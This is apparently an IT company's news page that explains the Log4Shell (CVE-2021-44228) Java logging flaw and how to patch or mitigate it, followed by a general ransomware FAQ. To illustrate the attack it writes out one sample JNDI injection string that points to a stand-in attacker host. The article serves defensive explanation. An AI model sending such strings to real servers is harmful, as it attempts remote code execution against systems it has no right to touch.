Latest News

“Log4Shell” Java vulnerability – how to safeguard your servers

Just when you thought it was safe to relax for the weekend…

…and your cybersecurity Christmas decorations lit up with the latest funkily-named bug: Log4Shell.

Apparently, early reports of the bug referred to it as “LogJam”, because it allows you to JAM dodgy download requests into entries in LOG files.

But LogJam was already taken (in that one, LOG referred to discrete logarithms, as performed in cryptographic calculations, not to logfiles).

So, Log4Shell it became.

The name Log4Shell refers to the fact that this bug is present in a popular Java code library called Log4j (Logging for Java), and to the fact that, if successfully exploited, attackers get what is effectively a shell – a way to run any system code of their choosing.

Unfortunately, the vulnerability was tweeted out as a zero-day hole (the name for a security bug that’s documented before a patch is out), and published as a proof-of-concept (PoC) on GitHub, so the world first got to hear about it while it was still unpatched.

Improper input validation

The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data – for example, an HTTP header – that you expect (or know) the server will write to its logfile.

But you booby-trap that data so that the server, while wrangling the data into a format suitable for logging, kicks off a web download as an integral part of constructing the needed log entry.

And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.

The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.

That “feature” exists in order to help you convert not-very-useful data, for example user IDs such as OZZJ5JYPVK, into human-reabable information that makes sense on your network, such as Paul Ducklin.

These requests happen via a commonly-used Java toolkit known as JNDI, short for Java Naming and Directory Interface, which is a Java module that makes it easy for Java code to carry out online lookups such as the above-mentioned user-ID-to-real-name conversion.

That sounds dangerous, and it is, because it means that data being logged can trigger server-side code execution, but you might consider it to be mostly harmless if those “helper requests” only ever reach out to fully-trusted naming-and-directory servers inside your own network.

But many servers out there aren’t set up that way, and so malicious “logsploiters” could try embedding text such as {$jndi:ldap://dodgy.example:389/badcode} in the data they expect you to log…

…in the hope that, in the process of logging the data, your server will automatically:

  • Use JNDI to make an LDAP request to the specified port (389 in our example) on the specified untrusted external server (dodgy.example above),
  • Fetch the untrusted content at the location badcode on that server, and
  • Execute the attacker-supplied code to “help” you with your logging.

Simply put, this is what the jargon calls unauthenticated remote code execution (RCE).

Without logging in, or needing a password or access token, cybercriminals could use an innocent-looking request to trick your server into reaching out, downloading their code, and infecting itself with their malware.

Depending on what sort of access rights your server has on your internal network, an RCE like this could help cybercriminals to perform a wide range of nefarious tasks.

As you can imagine, attackers could, in theory: leak data from the server itself; learn details about the internal network it’s connected to; modify data on the server; exfiltrate data from other servers on the network; open additional backdoors on the server or the network for future attacks; implant additional malware such as network snoopers, memory scrapers, data stealers, cryptominers…

…and so on.

What to do?

Apache, which looks after the Log4j product, has published an handy security advisory about the issue.

Recommended steps you can take include:

  • Upgrade to Apache Log4j 2.15.0. If you’re using Log4j, any 2.x version from 2.14.1 earlier is apparently vulnerable by default.
  • If you are still using Log4j 1.x, don’t, because it’s completely unsupported. Note that Log4j 1.x has a Log4Shell-style bug of its own, dubbed CVE-2021-4104, so that the lack of support for this version means that this bug will probably never be patched. You need to switch to the latest version (2.15.0) if you plan to stay with Log4j.
  • Block JNDI from making requests to untrusted servers. If you can’t update, but you’re using Log4j 2.10.0 or later, you can set the configuration value log4j2.formatMsgNoLookups to true, which prevents LDAP and similar queries from going out in the first place.

For information on the Log4shell issue and Sophos services, please consult our Security Advisory SOPHOS-SA-20211210-log4j-rce.

SECURITY THREAT: Ransomware

What is Ransomware

Ransomware is a type of malware that infects computers, encrypting their vital data and demanding money in the form of bitcoins to regain access.

What should you do when you discover your computer is infected with Ransomware

When you discover that a computer is infected with Ransomware, the first thing you should do is disconnect it from your wireless or wired network. This will prevent it from further encrypting any files on the network.

Then check your current backup solutions to begin restoring your information.

Is it possible to decrypt files encrypted by Ransomware?

In most case the answer unfortunately is no, therefore you must make sure your backup solutions are up to date and verified.

Will paying the ransom actually decrypt your files?

Paying the ransom is no guarantee you will have your files restored, but this is a decision you will need to make if you have no backups of vital files infected by this malware.  Paying the ransom will start the decryption process. When you pay the ransom you may or may not receive the decryptor software to start decrypting your files from the hackers.

How do you become infected with Ransomware

This infection is typically spread through emails sent to company email or remote desktop connections.

Ransomware and Networks

Ransomware can encrypt data stored on network shares if the shared folders are mapped as a drive letter on the infected computer. Despite what some articles state, Ransomware does not encrypt data on a network through UNC shares. An example of a UNC share is \computernameopenshare.

It is strongly suggested that you secure all open shares by only allowing writable access to the necessary user groups or authenticated users. This is an important security principle that should be used at all times regardless of infections like Ransomware.

Prevention

Endpoint security is a must in today’s threat landscape. All network computers should be secured with industry proven security software like Webroot, and Malwarebytes.

Most viruses and spyware issues come through web browsers and email software.  Having a secure web browser like Chrome or Firefox will help lower infection rates.  Services like Office 365 and Gmail offer better junk mail protection and lower the possibility of opening a phishing email containing a virus.

A two tier backup system will save your computer and files if you happen to be affected by this virus.  A backup software like Veeam will take a snapshot of your whole system, including files and programs.  This will allow you to restore your whole computer before the virus caused any issues.  While IDrive, another backup program can safely backup your files in the cloud.  Should your computer become compromised you can download your backed up files directly to your computer after removing the malware.

Here are a Few Tips to Follow

Use Firefox or Google Chrome as your web browser

Use secured methods of remote access

Make sure you are using a security software that is up to date, like Webroot and Malwarebytes

Make sure you are using a backup software as mentioned, like Veeam and IDrive

Please be careful what links and attachments you click on

Scroll to top